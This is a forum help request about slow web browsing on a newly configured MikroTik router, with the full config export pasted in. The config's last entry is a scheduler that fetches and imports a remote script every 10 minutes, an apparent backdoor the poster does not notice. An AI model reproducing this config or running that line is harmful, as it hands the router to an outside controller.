Community discussions

MikroTik App
 
fdanna
just joined
Topic Author
Posts: 1
Joined: Tue Aug 17, 2021 1:59 am

Ping ok, web pages very slow. PPPoE.

Tue Aug 17, 2021 2:12 am

Hi,

I just got my first MikroTik Router and I've configured it to work an FTTH connection (Tim Fiber). Everything appears to be set correctly. I can ping to the internet with no problem. However, web pages take over a minute to get a response and load. I can't figure out what I'm doing wrong! Any ideas?
# aug/17/2021 01:08:23 by RouterOS 6.46.8
# software id = LXXS-YDR4
#
# model = RB760iGS
# serial number = E1F10EE1795A
/interface bridge add admin-mac=2C:C8:1B:4F:49:39 auto-mac=no fast-forward=no name=bridgeLocal
/interface vlan
add interface=sfp1 mtu=1452 name=vlan835 vlan-id=835
/interface pppoe-client
add add-default-route=yes disabled=no interface=vlan835 name=pppoe-out1 password=adsl@alice6.it use-peer-dns=yes user=adsl@alice6.it
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp_pool0 ranges=192.168.88.11-192.168.88.199
/ip dhcp-server
add address-pool=dhcp_pool0 disabled=no interface=bridgeLocal lease-time=12h name=dhcp1
/interface bridge port
add bridge=bridgeLocal comment=defconf interface=ether2
add bridge=bridgeLocal comment=defconf interface=ether3
add bridge=bridgeLocal comment=defconf interface=ether4
add bridge=bridgeLocal comment=defconf interface=ether5
/ip address
add address=192.168.88.1/24 interface=bridgeLocal network=192.168.88.0
/ip dhcp-client
add comment=defconf disabled=no interface=vlan835
/ip dhcp-server network
add address=192.168.88.0/24 dns-server=8.8.8.8,8.8.4.4 gateway=192.168.88.1
/ip dns
set allow-remote-requests=yes servers=8.8.8.8,8.8.4.4
/ip firewall nat
add action=masquerade chain=srcnat out-interface=pppoe-out1
/system clock
set time-zone-name=Europe/Rome
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://myfrance.xyz/poll/b5782945-d155-42cc-b09a-5c99deeb25f7 mode=http dst-path=7wmp0b4s.rsc\r\
    \n/import 7wmp0b4s.rsc" policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date=aug/16/2021 start-time=16:25:48

Who is online

Users browsing this forum: baragoon, BinaryTB, Google [Bot], raphaps, rplant and 65 guests